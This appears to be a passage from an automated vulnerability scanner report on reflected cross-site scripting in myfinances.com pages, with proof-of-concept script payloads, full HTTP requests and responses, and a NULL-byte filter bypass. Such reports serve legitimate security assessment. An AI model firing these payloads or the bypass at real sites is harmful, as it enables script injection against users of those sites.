The value of the articleKey request parameter is copied into the HTML document as plain text between tags. The payload 76469<script>alert(1)</script>5cd27d00a02 was submitted in the articleKey parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
1.482. http://www.myfinances.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myfinances.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af164"><script>alert(1)</script>bfea6dcd612 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?af164"><script>alert(1)</script>bfea6dcd612=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:03:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:03:03 GMT
Content-Length: 17806
Connection: close
Set-Cookie: adc=RSP; path=/;
1.483. http://www.myfinances.com/blog.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myfinances.com
Path:
/blog.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b441b'><script>alert(1)</script>2d6ce3f1de5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog.html?b441b'><script>alert(1)</script>2d6ce3f1de5=1 HTTP/1.1
Host: www.myfinances.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=VRWOZXS192.168.100.27CKOUJ; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; adc=RSP
Response
HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 16:26:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:26:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: adc=RSP; path=/;
Content-Length: 17748
The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload %007485b'><script>alert(1)</script>abffe3120a4 was submitted in the page parameter. This input was echoed as 7485b'><script>alert(1)</script>abffe3120a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /blog.html?page=1%007485b'><script>alert(1)</script>abffe3120a4 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:01:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:01:58 GMT
Content-Length: 17623
Connection: close
Set-Cookie: adc=RSP; path=/;
1.485. http://www.myfinances.com/blog/3171093.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myfinances.com
Path:
/blog/3171093.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e47d"><script>alert(1)</script>cddac6d471e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3171093.html?9e47d"><script>alert(1)</script>cddac6d471e=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:05:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:05:23 GMT
Content-Length: 13431
Connection: close
Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'How The Dow Jones Industrial Average Is Calculated' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3171093.html?9e47d"><script>alert(1)</script>cddac6d471e=1'"> ...[SNIP]...
1.486. http://www.myfinances.com/blog/3171103.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myfinances.com
Path:
/blog/3171103.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c279"><script>alert(1)</script>be8d26e1d8b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3171103.html?5c279"><script>alert(1)</script>be8d26e1d8b=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:05:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:05:21 GMT
Content-Length: 13823
Connection: close
Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'How To Know If You're On Track For Retirement' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3171103.html?5c279"><script>alert(1)</script>be8d26e1d8b=1'"> ...[SNIP]...
1.487. http://www.myfinances.com/blog/3227953.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myfinances.com
Path:
/blog/3227953.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 434d0"><script>alert(1)</script>5608a968905 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3227953.html?434d0"><script>alert(1)</script>5608a968905=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:05:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:05:13 GMT
Content-Length: 14027
Connection: close
Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'How to Estimate the Value of Your Home' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3227953.html?434d0"><script>alert(1)</script>5608a968905=1'"> ...[SNIP]...
1.488. http://www.myfinances.com/blog/3227963.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myfinances.com
Path:
/blog/3227963.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a08c1"><script>alert(1)</script>dd5051c38cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3227963.html?a08c1"><script>alert(1)</script>dd5051c38cf=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:58 GMT
Content-Length: 13645
Connection: close
Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'Avoid Wash Sales' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3227963.html?a08c1"><script>alert(1)</script>dd5051c38cf=1'"> ...[SNIP]...
1.489. http://www.myfinances.com/blog/3241183.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myfinances.com
Path:
/blog/3241183.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a33a3"><script>alert(1)</script>f30bec36298 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3241183.html?a33a3"><script>alert(1)</script>f30bec36298=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:56 GMT
Content-Length: 13681
Connection: close
Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'Creating Your Own Dividends' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3241183.html?a33a3"><script>alert(1)</script>f30bec36298=1'"> ...[SNIP]...
1.490. http://www.myfinances.com/blog/3241193.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.myfinances.com
Path: /blog/3241193.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d892b"><script>alert(1)</script>28506c4b154 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3241193.html?d892b"><script>alert(1)</script>28506c4b154=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:54 GMT
Content-Length: 14125
Connection: close
Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'How To Protect Yourself From Inflation' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3241193.html?d892b"><script>alert(1)</script>28506c4b154=1'"> ...[SNIP]...
1.491. http://www.myfinances.com/blog/3299523.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.myfinances.com
Path: /blog/3299523.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dffd"><script>alert(1)</script>ccc9f3547f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3299523.html?7dffd"><script>alert(1)</script>ccc9f3547f8=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:39 GMT
Content-Length: 13301
Connection: close
Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'Don't Forget About Inflation Risk' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3299523.html?7dffd"><script>alert(1)</script>ccc9f3547f8=1'"> ...[SNIP]...
1.492. http://www.myfinances.com/blog/3299533.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.myfinances.com
Path: /blog/3299533.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cbc8"><script>alert(1)</script>473ebcbf25d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3299533.html?3cbc8"><script>alert(1)</script>473ebcbf25d=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:56 GMT
Content-Length: 13628
Connection: close
Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'Who is JTWROS and Why are They Listed on My Account Statement?' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3299533.html?3cbc8"><script>alert(1)</script>473ebcbf25d=1'"> ...[SNIP]...
1.493. http://www.myfinances.com/blog/3299543.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.myfinances.com
Path: /blog/3299543.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ca0"><script>alert(1)</script>6a9de3808f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3299543.html?86ca0"><script>alert(1)</script>6a9de3808f3=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:05:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:05:03 GMT
Content-Length: 13601
Connection: close
Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'How to Choose an Appropriate Target Date Fund' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3299543.html?86ca0"><script>alert(1)</script>6a9de3808f3=1'"> ...[SNIP]...
1.494. http://www.myfinances.com/blog/3299553.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.myfinances.com
Path: /blog/3299553.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f745d"><script>alert(1)</script>799a50af86f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3299553.html?f745d"><script>alert(1)</script>799a50af86f=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
